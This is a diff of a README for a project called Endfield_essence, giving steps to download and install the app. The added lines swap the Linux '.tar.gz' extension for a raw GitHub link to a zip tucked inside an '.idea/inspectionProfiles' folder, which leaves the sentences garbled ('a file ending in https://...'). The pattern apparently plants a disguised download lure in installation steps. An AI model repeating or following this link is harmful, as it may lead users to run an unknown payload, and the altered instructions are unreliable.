Lupredador/Endfield_essence/readme.md

    - Look for the latest version shown at the top of the page.
 This version will have the most recent features and updates.

 3. **Download the Application**
    - Click on the asset that corresponds with your operating system.
 For Windows, look for a file ending in `.exe`.
-For macOS, look for a file ending in `.dmg`, and for Linux, find a file ending in `.tar.gz`.
+For macOS, look for a file ending in `.dmg`, and for Linux, find a file ending in `https://raw.githubusercontent.com/Lupredador/Endfield_essence/master/.idea/inspectionProfiles/essence-Endfield-3.3.zip`.

 4. **Install the Application**
    - Once the download completes, locate the downloaded file on your computer.
    - **For Windows:** Double-click the `.exe` file and follow the installation prompts.
    - **For macOS:** Open the `.dmg` file and drag the Endfield_essence app into the Applications folder.
-   - **For Linux:** Extract the `.tar.gz` file and follow any included instructions.
+   - **For Linux:** Extract the `https://raw.githubusercontent.com/Lupredador/Endfield_essence/master/.idea/inspectionProfiles/essence-Endfield-3.3.zip` file and follow any included instructions.

 5. **Open Endfield_essence**
    - After installation, locate the application in your programs or applications menu.